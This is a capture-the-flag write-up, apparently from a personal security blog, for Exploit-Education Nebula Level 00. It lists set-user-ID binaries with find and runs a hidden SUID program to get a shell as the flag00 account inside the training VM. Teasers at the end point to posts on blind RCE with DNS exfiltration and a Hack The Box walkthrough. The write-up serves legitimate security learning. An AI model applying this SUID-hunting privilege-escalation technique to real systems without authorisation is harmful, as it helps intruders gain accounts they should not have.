Exploit-Education Nebula Level 00

1 minute read

Exploit Education Level 0

Challenge

This level requires you to find a Set User ID program that will run as the flag00 account.You could also find this by carefully looking in top level directories in / for suspicious looking directories.

Alternatively, look at the find man page.

To access this level, log in as level00 with the password of level00.

Solution

We have to use find to find a file with setuser id bit set

level00@nebula:~$ find / -perm -4000 2>/dev/null | less

lets see what the parameters indicate

/               it asks find to look for files in root directory
-perm -4000     its is used to display all files with the setuserid set
2>/dev/null     gets rid of all error messages

level00@nebula:~$ find / -perm -4000 2>/dev/null | less
/bin/.../flag00
/bin/fusermount
/bin/mount
/bin/pis
/bin/ping6
/bin/su
/bin/umount
/sbin/mount.ecryptfs_private
/usr/bin/at
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/gpasswd

we can see a file named flag00. lets investigate

level00@nebula:/$ cd /bin/.../
level00@nebula:/bin/...$ ls -la
total 8
drwxr-xr-x 2 root   root      29 2011-11-20 21:22 .
drwxr-xr-x 3 root   root    2728 2012-08-18 02:50 ..
-rwsr-x--- 1 flag00 level00 7358 2011-11-20 21:22 flag00

we can see that the setuserid bit is set for flag00. lets run it

level00@nebula:/bin/...$ ./flag00
Congrats, now run getflag to get your flag!
flag00@nebula:/bin/...$ getflag
You have successfully executed getflag on a target account

Solved!

You may also enjoy

Blind RCE and DNS Exfilteration

6 minute read

Description: I was doing a security testing against a web server running WebLogic. A potential RCE due to CVE-2019-2725 was reported and I was verifying it. I was following the PoC given here.

Hack The Box - Forest Writeup

8 minute read

Description: Forest is a easy level box that can be really helpful to practice some AD related attacks. Although rated as easy, it was a medium box for me considering that all attack vectors where pretty new to me.